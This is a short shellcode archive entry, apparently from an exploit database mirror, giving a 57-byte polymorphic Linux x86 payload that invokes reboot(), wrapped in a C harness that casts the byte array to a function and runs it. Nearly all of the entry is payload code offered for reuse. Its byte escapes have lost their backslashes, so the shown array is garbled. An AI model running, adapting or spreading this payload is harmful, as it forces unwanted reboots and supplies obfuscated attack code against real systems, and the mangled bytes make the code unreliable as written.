[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 reboot() polymorphic shellcode 57 bytes
# Published : 2009-06-29
# Author : Jonathan Salwan
# Previous Title : win32 xp-sp3 beep and exitprocess shellcode 28 bytes
# Next Title : linux/x86 execve shellcode generator null byte free
/*
* Title : reboot() polymorphic shellcode - 57 bytes
* Os: Linux x86
*
* Author: Jonathan Salwan - submit AT shell-storm.org
* Web: http://www.shell-storm.org
*
*
* !! Database of shellcodes => http://www.shell-storm.org/shellcode/
*
*/
#include <stdio.h>
char shellcode[] = "xebx11x5ex31xc9xb1x30x80"
"x6cx0exffx01x80xe9x01x75"
"xf6xebx05xe8xeaxffxffxff"
"x32xc1x51x69x63x70x70x75"
"x69x6fx30x73x66x69x30x74"
"x63x6ax8axe4x51x8axe3x54"
"x8axe3x54x8axe2xb1x0cxce"
"x81";
int main()
{
fprintf(stdout,"Length: %dn",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
// www.Syue.com [2009-06-29]